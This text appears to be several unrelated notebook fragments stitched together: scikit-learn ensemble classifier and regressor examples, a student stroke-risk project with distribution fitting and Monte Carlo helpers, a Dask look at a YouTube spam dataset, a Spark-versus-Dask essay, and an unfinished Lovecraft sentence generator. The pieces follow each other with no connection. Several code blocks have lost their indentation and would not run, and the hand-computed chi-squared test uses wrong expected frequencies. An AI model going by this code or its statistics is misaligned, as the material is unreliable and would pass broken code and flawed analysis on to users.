base_clf = KNeighborsClassifier(n_neighbors=k)
bag_clf = BaggingClassifier(
base_clf,
n_estimators = 500,
max_samples=0.5,
n_jobs = -1,
bootstrap=True)
y_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Precision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Bagging with Decision Tree
This example implements a bagging classifier of 500 decision trees. It then demonstrates the performance metrics for the algorithm under a 5-fold cross validation.
```
from sklearn.tree import DecisionTreeClassifier
base_clf = DecisionTreeClassifier()
bag_clf = BaggingClassifier(
base_clf,
n_estimators = 500,
max_samples=0.5,
n_jobs = -1,
bootstrap=True)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(bag_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Precision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Out of Bag Validation
This example creates a bagging-method ensemble classifier with decision trees up to depth 10. It is configured to output `oob_score_`, an out-of-bag estimate of the validation accuracy.
```
from sklearn.tree import DecisionTreeClassifier
base_clf = DecisionTreeClassifier(max_depth=10)
bag_clf = BaggingClassifier(
base_clf,
n_estimators = 500,
max_samples=0.5,
n_jobs = -1,
oob_score=True,
bootstrap=True)
bag_clf.fit(train_X_data, train_y_data)
bag_clf.oob_score_
```
## Random Forest Example
This example creates a random forest of decision tree classifiers with 500 estimators and a maximum depth limit of 10 for each.
The output shows the cross validation confusion matrix and the performance metrics.
```
from sklearn.ensemble import RandomForestClassifier
rf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(rf_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Precision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Feature Importance and Out of Bag Validation for Random Forest
This example demonstrates a random forest classifier with the oob_score turned to true.
We output from it the importance score for each feature. We also output the out of bag cross validation score.
```
from sklearn.ensemble import RandomForestClassifier
rf_clf = RandomForestClassifier(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)
rf_clf.fit(train_X_data, train_y_data)
for name, score in zip(feature_names, rf_clf.feature_importances_):
print(name, score)
print("\n\nOut of Bag Validation:", rf_clf.oob_score_)
```
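Feature importances are often easier to read as a bar chart. The sketch below is self-contained with synthetic data (the feature names are reused only as labels); with the cells above, the same two plotting lines work with `rf_clf.feature_importances_` and `feature_names`:

```python
import numpy as np
from matplotlib import pyplot as plt
from sklearn.ensemble import RandomForestClassifier

# Synthetic data: only the first two features actually drive the label
rng = np.random.RandomState(0)
X = rng.randn(200, 6)
y = (X[:, 0] + 0.5 * X[:, 1] > 0).astype(int)
names = ["Age", "Fare", "SibSp", "Parch", "Class", "Female"]

clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, y)
# Importances sum to 1; plot one bar per feature
plt.bar(names, clf.feature_importances_)
plt.ylabel("importance")
```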
## AdaBoost
This example creates an AdaBoost classifier ensemble of 100 decision stumps (max depth = 1) using the SAMME.R algorithm and a learning rate of 1.0.
The output shows the cross validation confusion matrix and the performance metrics. Note the similar performance to the previous ensemble, but with lower precision and recall showing that the model is overfitting a bit.
```
# Adaboost goes here
from sklearn.ensemble import AdaBoostClassifier
ada_clf = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=1), n_estimators=100,
algorithm="SAMME.R", learning_rate=1.0)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(ada_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Precision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Gradient Boost Decision Tree Classifier
This example creates a Gradient Boosting Decision Tree classifier ensemble of decision trees with max depth = 5 and 100 estimators in sequence.
The output shows the cross validation confusion matrix and the performance metrics.
```
from sklearn.ensemble import GradientBoostingClassifier
gb_clf = GradientBoostingClassifier(max_depth=5, n_estimators=100)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Precision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
## Gradient Boost Decision Tree Classifier with Early Stopping
This example creates a Gradient Boosting Decision Tree classifier ensemble of decision trees with max depth = 5, using early stopping to determine the number of estimators that produces the best results.
The output shows the cross validation confusion matrix and the performance metrics of a model with the optimal number of estimators.
```
from sklearn.ensemble import GradientBoostingClassifier
# Split the training into a training and validation set
X_train, X_val, y_train, y_val = train_test_split(train_X_data, train_y_data)
max_tree_depth=5
gb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=1000)
gb_clf.fit(X_train, y_train)
errors = [mean_squared_error(y_val, y_pred)
for y_pred in gb_clf.staged_predict(X_val)]
bst_n_estimators = np.argmin(errors) + 1  # staged_predict is 0-indexed; estimator counts start at 1
print("Best Number of Estimators:" + str(bst_n_estimators))
gb_clf = GradientBoostingClassifier(max_depth=max_tree_depth, n_estimators=bst_n_estimators)
# Crossvalidation with our ensemble classifier
y_pred = cross_val_predict(gb_clf, train_X_data, train_y_data, cv=5)
print("Confusion Matrix:")
print(confusion_matrix(train_y_data, y_pred))
print("Accuracy Score = " + str(accuracy_score(train_y_data, y_pred)))
print("Precision Score = " + str(precision_score(train_y_data, y_pred)))
print("Recall Score = " + str(recall_score(train_y_data,y_pred)))
print("F1 Score = " + str(f1_score(train_y_data,y_pred)))
```
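The early-stopping search above can also be visualized by plotting the staged validation error and marking its minimum. This sketch is self-contained with synthetic data, so the curve itself is only illustrative:

```python
import numpy as np
from matplotlib import pyplot as plt
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split

# Synthetic binary classification problem for illustration
rng = np.random.RandomState(0)
X = rng.randn(300, 4)
y = (X[:, 0] + X[:, 1] ** 2 > 1).astype(int)
X_tr, X_val, y_tr, y_val = train_test_split(X, y, random_state=0)

gb = GradientBoostingClassifier(max_depth=2, n_estimators=200).fit(X_tr, y_tr)
# One validation error per stage (i.e. per number of trees used)
errors = [mean_squared_error(y_val, p) for p in gb.staged_predict(X_val)]
best = int(np.argmin(errors)) + 1  # stages are 0-indexed, estimator counts are not

plt.plot(range(1, len(errors) + 1), errors)
plt.axvline(best, linestyle="--")
plt.xlabel("n_estimators")
plt.ylabel("validation MSE")
print("best n_estimators:", best)
```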
# Boston Housing Cost Estimator
Building off the classifier examples above, this section shows ensemble regressors using bagging and random forests.
## Setup
```
# Load Data Set
# Note: load_boston is deprecated and was removed in scikit-learn 1.2;
# on newer versions substitute e.g. datasets.fetch_california_housing()
boston_housing_data = datasets.load_boston()
train_X, test_X, train_y, test_y = train_test_split(boston_housing_data.data,
boston_housing_data.target,
test_size=0.33)
def plot_learning_curves(model, X, y):
"""
Plots performance on the training set and testing (validation) set.
X-axis - number of training samples used
Y-axis - RMSE
"""
train_X, test_X, train_y, test_y = train_test_split(X, y, test_size = 0.20)
training_errors, validation_errors = [], []
for m in range(1, len(train_X)):
model.fit(train_X[:m], train_y[:m])
train_pred = model.predict(train_X)
test_pred = model.predict(test_X)
training_errors.append(np.sqrt(mean_squared_error(train_y, train_pred)))
validation_errors.append(np.sqrt(mean_squared_error(test_y, test_pred)))
plt.plot(training_errors, "r-+", label="train")
plt.plot(validation_errors, "b-", label="test")
plt.legend()
plt.axis([0, 80, 0, 3])
```
## Linear Regression on Boston Data Set (for comparison)
For comparison, a linear regression on the Boston data is shown.
```
from sklearn.linear_model import LinearRegression
lin_reg = LinearRegression()
lin_reg.fit(train_X,train_y)
pred_y = lin_reg.predict(test_X)
# Outputs the intercept and coefficient of the model (theta_0 and theta_1 respectively)
print("Theta:")
print(lin_reg.intercept_, lin_reg.coef_)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(lin_reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Bagging Regressor using Linear Regression as Base
This example implements a bagging regressor with a linear regression model as the base classifier. It shows the histogram of the price estimation error. It also shows the learning curve for the model.
```
## Bagging with Linear Regression
from sklearn.ensemble import BaggingRegressor
from sklearn.linear_model import LinearRegression
base_reg = LinearRegression()
bag_reg = BaggingRegressor(
base_reg,
n_estimators = 500,
max_samples=1.0,
n_jobs = -1,
bootstrap=False) # sampling without replacement in this configuration
bag_reg.fit(train_X, train_y)
pred_y = bag_reg.predict(test_X)
# Output the intercept and coefficients of one of the bagged base linear models
print("Theta (first base estimator):")
print(bag_reg.estimators_[0].intercept_, bag_reg.estimators_[0].coef_)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(bag_reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Random Forest Regression Example
This example implements a random forest regressor using decision trees up to depth 10. It shows the histogram of the price estimation error. It also shows the learning curve for the model.
```
from sklearn.ensemble import RandomForestRegressor
rf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10)
rf_reg.fit(train_X, train_y)
pred_y = rf_reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(rf_reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Random Forest Regressor: Feature Importance and Out of Bag Validation Score
This example shows a random forest regressor using decision trees constrained to a maximum depth of 10. Out of bag score is enabled.
```
from sklearn.ensemble import RandomForestRegressor
rf_reg = RandomForestRegressor(n_estimators=500, n_jobs=-1, max_depth=10, oob_score=True)
rf_reg.fit(train_X, train_y)
for name, score in zip(boston_housing_data.feature_names, rf_reg.feature_importances_):
print(name, score)
print("\n\nOut of Bag Validation:", rf_reg.oob_score_)
```
## AdaBoost Regression Example
This example implements an AdaBoost ensemble regressor with 100 sequential decision trees of max depth 2; the learning rate is lowered to 0.2 to improve generalization. It shows the histogram of the price-estimation error and the learning curve for the model.
```
from sklearn.ensemble import AdaBoostRegressor
from sklearn.tree import DecisionTreeRegressor
#Ada Boost Regressor
reg = AdaBoostRegressor(
DecisionTreeRegressor(max_depth=2),
n_estimators=100,
learning_rate=0.2)
reg.fit(train_X, train_y)
pred_y = reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Gradient Boosting Regressor Example
This example implements a Gradient Boosting regressor whose ensemble of 50 estimators consists of decision stumps (depth-1 trees).
It shows the histogram of the price-estimation error and the learning curve for the model.
```
from sklearn.ensemble import GradientBoostingRegressor
reg = GradientBoostingRegressor(max_depth=1, n_estimators=50)
reg.fit(train_X, train_y)
pred_y = reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(reg, train_X, train_y)
plt.axis([0,300,0,10])
```
## Gradient Boosting Regressor Example with early stopping
This example implements a Gradient Boosting regressor with early stopping enabled. It shows the histogram of the price-estimation error and the learning curve for the model.
```
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
# Split the training set into a smaller training set and a validation set
X_train, X_val, y_train, y_val = train_test_split(train_X, train_y)
max_tree_depth=1
reg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=1000)
reg.fit(X_train, y_train)
errors = [mean_squared_error(y_val, y_pred)
for y_pred in reg.staged_predict(X_val)]
bst_n_estimators = np.argmin(errors) + 1  # staged_predict yields predictions after stage 1, 2, ...
print("Best Number of Estimators:" + str(bst_n_estimators))
reg = GradientBoostingRegressor(max_depth=max_tree_depth, n_estimators=bst_n_estimators)
##
reg.fit(train_X, train_y)
pred_y = reg.predict(test_X)
plt.figure("a")
plt.hist(abs(test_y - pred_y),bins=100)
plt.xlabel("Error ($k)")
print("MAE = " + str(mean_absolute_error(test_y, pred_y)))
plt.figure("b")
plot_learning_curves(reg, train_X, train_y)
plt.axis([0,300,0,10])
```
<img style="float: left; margin: 30px 15px 15px 15px;" src="https://pngimage.net/wp-content/uploads/2018/06/logo-iteso-png-5.png" width="300" height="500" />
### <font color='navy'> Simulation of financial processes.
**Names:** Ana Esmeralda Rodriguez Rodriguez, Antonio de Santiago Rosas Saldaña.
**Date:** March 9, 2021.
**Student IDs**: If709288, Af713803.
**Professor:** Oscar David Jaramillo Zuluaga.
**GitHub link**: https://github.com/Tonydesanty/Proyecto-entrega-1/blob/main/Entrega%201%20proyecto.ipynb
# Project TOPIC-2
**Introduction:**
Today there are several lethal diseases, such as cancer, coronavirus, and diabetes, among others. Our project focuses on strokes (cerebrovascular accidents), currently the second-deadliest disease worldwide.
A cerebrovascular injury occurs when blood flow to the brain is partially interrupted. When that happens, the brain stops receiving the oxygen and nutrients it needs to function, and cells and neurons begin to die rapidly.
Factors that can contribute to a stroke:
• High blood pressure.
• Diabetes.
• Heart disease.
• Smoking.
• Genetics.
• Age.
• Alcohol consumption.
• Drug use.
• Cholesterol.
• Obesity.
**General objective:**
Build a model that diagnoses whether a person suffers from cerebrovascular disease.
**Secondary objectives:**
1. Use Monte Carlo simulation to find the probability that a person develops cerebrovascular disease given their age.
2. Use Monte Carlo simulation to find the probability that a person develops cerebrovascular disease given their body mass index.
3. Use Monte Carlo simulation to find the probability that a person develops cerebrovascular disease given their glucose level.
4. Use Monte Carlo simulation to find the probability that a person develops cerebrovascular disease given their smoking habits.
**Problem definition**:
Diseases are a natural part of a person's life cycle; people contract different diseases depending on their habits, psychological state, or age. Cerebrovascular diseases are a present-day problem: they have the second-highest mortality rate, after ischemic heart disease.
Building a model that estimates the probability that a person will develop cerebrovascular disease in the future would be very useful: we could forecast the risk from characteristics such as age and body mass index, anticipate outcomes, and make decisions to reduce that probability.
Using a dataset obtained from "https://www.kaggle.com/fedesoriano/stroke-prediction-dataset?select=healthcare-dataset-stroke-data.csv", we will build a model that predicts whether a person with given characteristics may develop cerebrovascular disease.
**Nodes to simulate:**
*Probability by age*: We chose to simulate this variable because age, and the state of the body, has a large impact on contracting disease: the older the person, the higher the chance of illness.
*Probability by body mass index:* Body mass is a health indicator; people with higher body mass are usually more prone to disease, so taking this indicator as a node is important, as we believe it may influence our results considerably.
*Probability by smoking habits*: Cigarettes are linked to many diseases, so it is interesting to estimate the probability of contracting the disease given one's smoking habits.
*Probability by glucose level*: Glucose indicates how much sugar is in the body; a regulated sugar level is optimal, while a level that is too high or too low can indicate diseases such as diabetes. Analyzing this variable can bring us closer to the result we are after.
**Hypothesis**
The people most likely to develop cerebrovascular disease are those who are over 70 years old, smoke, have a high body mass index, and have a low glucose level.
*Assumptions:*
The variables we simulate are the most significant ones for studying this disease.
All the information provided by the patients is 100% real.
Other diseases carry no relative weight in the study.
The variables analyzed have no important precedents (in the case of body mass and glucose).
All variables carry the same weight when presenting results.
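Each of the Monte Carlo estimates the objectives call for reduces to averaging an indicator function over simulated draws. A minimal sketch of that idea (the normal age distribution used here is an assumption for illustration only, not fitted to the Kaggle data):

```python
import numpy as np

# Hypothetical illustration: estimate P(age > 70) by Monte Carlo.
# The normal(50, 20) age distribution is an assumption for this sketch.
rng = np.random.default_rng(0)
ages = rng.normal(loc=50, scale=20, size=100_000)  # simulated patient ages
p_over_70 = np.mean(ages > 70)  # fraction of simulated patients older than 70
print(f"Estimated P(age > 70) = {p_over_70:.3f}")
```

The same pattern applies to the other nodes: draw from the fitted distribution of the variable and average the indicator of the event of interest.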

## Data Visualization
```
# Libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
import collections
import scipy.stats as st
from collections import Counter
from statsmodels.nonparametric.kernel_density import KDEMultivariate
# function that returns a probability density function for a dataset
def kde_statsmodels_mf(x, **kwargs):
    """Multivariate Kernel Density Estimation with Statsmodels"""
    kde = KDEMultivariate(x,
                          bw='cv_ml',
                          var_type='c', **kwargs)
    return lambda x_grid: kde.pdf(x_grid)
data = pd.read_csv('healthcare-dataset-stroke-data.csv')
data
clean_data = pd.DataFrame()
# Select the variables to analyze
clean_data['age'] = data['age']
clean_data['smoking_status'] = data['smoking_status']
clean_data['bmi'] = data['bmi']
clean_data['work_type'] = data['work_type']
# Reverse the rows so the earliest values come first
clean_data = clean_data.iloc[::-1]
# Replace the index with one whose values run in descending order
clean_data['index'] = [i for i in range(len(clean_data['age']))]
clean_data.set_index('index', inplace = True)
# Drop rows up to the first positive case
clean_data = clean_data.iloc[37:,:]
# fill null values
clean_data.fillna(0, inplace = True)
# Show the data frame
clean_data
```
## Age
```
totalages = clean_data['age']
totalages.head()
# plot a histogram of the data
J = 10 # number of histogram bins
[freq, x_hist, _] = plt.hist(totalages, bins = J, density = True ); # histogram
plt.show() # show the histogram
x_hist = x_hist[1:] # drop the first bin edge so x has exactly J samples
age = totalages
# Try different probability distributions
dist_list = ['bradford', 'beta','expon', 'exponnorm','norm','uniform','foldnorm', 'gennorm', 'ksone', 'kappa4', 'johnsonsb']
y_real, x_real, _ = plt.hist(age, bins = 15, density = True) # make a histogram
x_real = x_real[1:] # adjust the shape so it matches
def distribucion(dist_list):
    def imprimir(dist):
        param = getattr(st, dist).fit(age)
        y_est = getattr(st, dist).pdf(x_real, *param)
        plt.plot(x_real, y_est, label = dist);
        print('The error of the', dist, 'distribution is', (abs(y_real-y_est)*100/y_est).mean(), '%')
    [imprimir(dist) for dist in dist_list]
distribucion(dist_list)
plt.legend()
plt.show()
param = getattr(st, 'ksone').fit(age) # fit the parameters to the data
pi = st.ksone.pdf(x_hist, *param)
# Expected value using the theoretical expression
Ei = x_hist*pi
# Chi-squared statistic computed by hand
x2 = ((freq - Ei)**2 / Ei).sum()
print('Theoretical chi-squared value = ', x2)
# Chi-squared computed with the statistics library
X2 = st.chisquare(freq, Ei)
print('Library chi-squared value = ', X2)
# Degrees of freedom of the statistic
m = J-1 # degrees of freedom
Chi_est = st.chi2.ppf(q=0.95, df=m)
print('Chi-squared statistic = ', Chi_est)
func_edad = kde_statsmodels_mf(age)
x_g = np.arange(0, 100, 1)
plt.figure()
plt.plot(x_g, func_edad(x_g));
plt.hist(age, bins = 15, density = True);
plt.show()
f = func_edad
# find the maximum of the function and plot it
from scipy import optimize
x = np.arange(0, 100, 1)
max_fp = f(optimize.fmin(lambda x: -f(x), 0, disp=False))
plt.plot(0, max_fp, 'x', lw = 10)
plt.plot(x, func_edad(x))
```
## Functions to use
```
# Acceptance-rejection function using a constant envelope for t(x); it returns
# N random variables (i.e. it accepts exactly N values)
def acep_rechazo_simplificada(
        N:'number of variables to generate',
        Dom_f:'domain of f as a tuple (a,b)',
        f:'target function to sample from',
        max_f:'maximum value of f'
        ):
    a, b = Dom_f
    X = np.zeros(N)
    i = 0
    while i < N:
        x = np.random.uniform(a, b)      # candidate sample
        u = np.random.uniform(0, max_f)  # uniform height under the constant envelope
        if u <= f(x):                    # accept with probability f(x)/max_f
            X[i] = x
            i += 1
    return X
def histograma_vs_densidad(signal:'variable with random samples from the generated distribution',
                           f:'probability density function f(x) of the random variable'):
    plt.figure(figsize=(8,3))
    count, x, _ = plt.hist(signal, 100, density=True)
    y = f(x)
    plt.plot(x, y, linewidth=2, color='k')
    plt.ylabel('Probability')
    plt.xlabel('Samples')
    # plt.legend()
    plt.show()
def Gen_distr_discreta(p_acum: 'cumulative probabilities of the distribution to generate',
                       indices: 'real values to generate at random',
                       N: 'number of random values to generate'):
    U = np.random.rand(N)
    # Dictionary mapping positions to the real values
    rand2reales = {i: idx for i, idx in enumerate(indices)}
    # Series of the random values
    y = pd.Series([sum([1 for p in p_acum if p < ui]) for ui in U]).map(rand2reales)
    return y
def plot_histogram_discrete(distribucion:'distribution to plot as a histogram',
                            label:'legend label'):
    # len(set(distribucion)) counts the number of distinct elements of 'distribucion'
    plt.figure(figsize=[8,4])
    y, x = np.histogram(distribucion, density = True, bins = len(set(distribucion)) - 1)
    plt.bar(list(set(distribucion)), y, label=label)
    plt.legend()
    plt.show()
```
## Node 1 "Age"
```
edad = data['age']
print('The mean patient age is:', edad.mean())
plt.hist(edad, density=True, bins=82)
plt.xlabel('Range')
plt.ylabel('Frequency')
plt.title('Patient age')
plt.show()
# Probability calculation
lista_edad = pd.DataFrame(edad)
cantidad_edad = pd.value_counts(lista_edad["age"])
cantidad_edad
proba_edad = ((cantidad_edad/5110)*100)
proba_edad
acumulada_edad = np.cumsum(proba_edad)
acumulada_edad
info = pd.DataFrame({'Count by age': cantidad_edad, 'Probability by age': proba_edad, 'Cumulative probability': acumulada_edad})
info
# name a variable holding the relevant column of the df
total_age = info['Count by age']
total_age.head()
```
## Node 2 "BMI"
```
masa = data['bmi']
print('The mean patient BMI is:', masa.mean())
plt.hist(masa, density=True, bins=20)
plt.xlabel('Range')
plt.ylabel('Frequency')
plt.title('Patient body mass index')
plt.show()
lista_masa = pd.DataFrame(masa)
cantidad_masa = pd.value_counts(lista_masa["bmi"])
cantidad_masa
proba_masa = ((cantidad_masa/4909)*100)
proba_masa
acumulada_masa = np.cumsum(proba_masa)
acumulada_masa
info_masa = pd.DataFrame({'Count by BMI': cantidad_masa, 'Probability by BMI': proba_masa, 'Cumulative probability (BMI)': acumulada_masa})
info_masa
```
## Node 3 "Smoking"
**For the "Smoking" node we use these codes:**
0.- It is unknown whether the patient smokes.
1.- Smokes occasionally.
2.- Has never smoked.
3.- Smokes.
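As a hypothetical sketch, the text categories in `smoking_status` can be mapped to these codes with a pandas `map`; the string labels below are the categories used in the Kaggle stroke dataset, and the mapping itself is an assumption of this notebook's coding scheme:

```python
import pandas as pd

# Assumed coding scheme from the list above; the string labels are the
# smoking_status categories of the Kaggle stroke dataset.
codes = {"Unknown": 0, "formerly smoked": 1, "never smoked": 2, "smokes": 3}
s = pd.Series(["never smoked", "smokes", "Unknown", "formerly smoked"])
print(s.map(codes).tolist())  # → [2, 3, 0, 1]
```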
```
fuma = data['smoking_status']
print('The most common smoking status is:', fuma.mode()[0])
plt.hist(fuma, density=True, bins=4)
plt.xlabel('Range')
plt.ylabel('Frequency')
plt.title('Patient smoking habits')
plt.show()
lista_fuma = pd.DataFrame(fuma)
cantidad_fuma = pd.value_counts(lista_fuma["smoking_status"])
cantidad_fuma
proba_fuma = ((cantidad_fuma/5110)*100)
proba_fuma
acumulada_fuma = np.cumsum(proba_fuma)
acumulada_fuma
info_fuma = pd.DataFrame({'Count by smoking status': cantidad_fuma, 'Probability by smoking status': proba_fuma, 'Cumulative probability (smoking)': acumulada_fuma})
info_fuma
```
## Node 4 "Glucose"
```
glucosa = data['avg_glucose_level']
print('The mean patient glucose level is:', glucosa.mean())
plt.hist(glucosa, density=True, bins=20)
plt.xlabel('Range')
plt.ylabel('Frequency')
plt.title('Patient glucose level')
plt.show()
lista_glucosa = pd.DataFrame(glucosa)
cantidad_glucosa = pd.value_counts(lista_glucosa["avg_glucose_level"])
cantidad_glucosa
proba_glucosa = ((cantidad_glucosa/5110)*100)
proba_glucosa
acumulada_glucosa = np.cumsum(proba_glucosa)
acumulada_glucosa
```
## Node 5 "Work type"
**Codes for work type:**
0.- Children.
1.- Government job.
2.- Has never worked.
3.- Private.
4.- Self-employed.
```
trabajo = data['work_type']
print('The most common work type is:', trabajo.mode()[0])
plt.hist(trabajo, density=True, bins=5)
plt.xlabel('Range')
plt.ylabel('Frequency')
plt.title('Patient work type')
plt.show()
lista_trabajo = pd.DataFrame(trabajo)
cantidad_trabajo = pd.value_counts(lista_trabajo["work_type"])
cantidad_trabajo
proba_trabajo = ((cantidad_trabajo/5110)*100)
proba_trabajo
acumulada_trabajo = np.cumsum(proba_trabajo)
acumulada_trabajo
info_trabajo = pd.DataFrame({'Count by work type': cantidad_trabajo, 'Probability by work type': proba_trabajo, 'Cumulative probability (work type)': acumulada_trabajo})
info_trabajo
```
```
import dask.dataframe as dd  # conventional alias; avoids shadowing the dask package name
dask_df = dd.read_csv("*.csv")
dask_df
dask_df.head()
# Elnino Melendez sounds like she has some real wholesome, family-friendly content on her channel
dask_df.count().compute()
dask_df.columns
len(dask_df)
# Looks like 1956 instances (rows) and 5 features (columns)
dask_df['CLASS'].value_counts().compute()
# Looks like 1005 instances of spam and 951 of non-spam
dask_df['CONTENT'].str.lower().compute()[1:5]
spam = dask_df[(dask_df['CLASS'] == 1)].compute()
spam
len(spam)
# The 1005 spam comments
spam['CONTENT'].str.lower().str.contains('check').value_counts()
high_quality_non_spam_content = dask_df[(dask_df['CLASS'] == 0)].compute()
high_quality_non_spam_content
high_quality_non_spam_content['CONTENT'].str.lower().str.contains('check').value_counts()
# Yep. Looks like saying "Check out ....!" is a dead giveaway
# Instead, maybe they should utilize a colloquialism like "Take a gander at ...!"
high_quality_non_spam_content['CONTENT'].str.lower().str.contains('gander').value_counts()
spam['CONTENT'].str.lower().str.contains('gander').value_counts()
# Yep, looks like they just need to switch up their vernacular a bit
import matplotlib.pyplot as plt
import numpy as np
dask_df['dt'] = dask_df['DATE'].astype('M8[M]')
dask_df.head()
sorted_df = dask_df.set_index(['dt']).compute()
# Well, I was going to sort the values by month and then see how the spam counts changed over time
# but, it looks like sorting in dask takes a bit more time than I want to give it right now
```
# Big Data Options
Considerations in Spark vs Dask
Common considerations in determining whether Spark or Dask is more appropriate in a given situation often come down to personal preference and experience, though there are a few functional restrictions in choosing one over the other. Among the initial considerations will be one's experience in Python and potential prior experience in languages such as SQL or Scala. Dask is written in, and runs exclusively in, Python. Though this may sound restrictive, I appreciate the familiarity, as Python is the language in which I have the greatest degree of experience. Because Dask uses the pandas APIs, working with a Dask dataframe is only minimally different from working with a typical pandas dataframe. Spark, however, is written in Scala but provides support for both Python and R, while offering a moderately intuitive level of familiarity to those with experience in SQL. Rather than reusing APIs from a different library, as is the case with Dask and pandas, Spark has its own set of APIs. Again, given my familiarity with Python and pandas, Dask continues to be my high-level, big-data tool of choice.
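Because Dask reuses the pandas APIs, the spam-filtering chain used above translates almost verbatim between the two libraries. A sketch with plain pandas on hand-written toy rows (a Dask version would add a trailing `.compute()` to materialize each result):

```python
import pandas as pd

# The same value_counts / str-matching chain used on the Dask dataframe
# above, written against plain pandas; dask.dataframe exposes identical
# methods, plus a final .compute() to materialize results.
df = pd.DataFrame({
    "CONTENT": ["Check out my channel!", "Great video", "check this link", "nice"],
    "CLASS": [1, 0, 1, 0],
})
spam = df[df["CLASS"] == 1]
counts = spam["CONTENT"].str.lower().str.contains("check").value_counts()
print(counts[True])  # → 2
```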
```
import nltk
import re
import operator
from collections import defaultdict
import numpy as np
import matplotlib.pyplot as plt
```
The idea is to generate more plausible sentences based on their word tagging: each generated sentence keeps a real grammatical structure written by Lovecraft and is composed of the most common words seen in sentences of that structure.
The result should be a somewhat realistic phrase.
```
lovecraft = nltk.corpus.PlaintextCorpusReader("lovecraft", ".*")
class TaggedWord(object):
def __init__(self, words, count):
self.word_hash = {}
self.words = words
self.count = count
index = 0
for word in words:
self.word_hash[word] = index
index += 1
def update(self, word):
word_index = self.word_hash.get(word)
if word_index is not None:
self.count[word_index] += 1
else:
self.words.append(word)
self.count.append(1)
word_index = len(self.words) - 1
self.word_hash[word] = word_index
def get_random(self, seed):
np.random.seed(seed=seed)
total_count = sum(self.count)
probabilities = [word_count/total_count for word_count in self.count]
random_word_chose = np.random.multinomial(1, probabilities)
random_word_index = list(random_word_chose).index(1)
return self.words[random_word_index]
class Sentence(object):
def __init__(self, words, tags):
self.tags = tags
self.words = []
for word in words:
self.words.append(TaggedWord(words=[word.lower()], count=[1]))
def update(self, words):
word_index = 0
for word in words:
self.words[word_index].update(word.lower())
word_index += 1
def generate(self, seed):
return [word.get_random(seed) for word in self.words]
lovecraft_sentences = lovecraft.sents()
sentences = {}
sentence_count = defaultdict(int)
for tokenized_sentence in lovecraft_sentences:
sentence_with_tagged_words = nltk.pos_tag(tokenized_sentence)
sentence_words = list(zip(*sentence_with_tagged_words))[0]
sentence_tags = list(zip(*sentence_with_tagged_words))[1]
sentence_checksum = "-".join(sentence_tags)
if sentence_checksum in sentences:
sentences[sentence_checksum].update(sentence_words)
else:
sentences[sentence_checksum] = Sentence(words=sentence_words, tags=sentence_tags)
sentence_count[sentence_checksum] += 1
total_count = sum(sentence_count.values())
sentence_tags = [_sentence_tags for _sentence_tags in sentences.keys()]
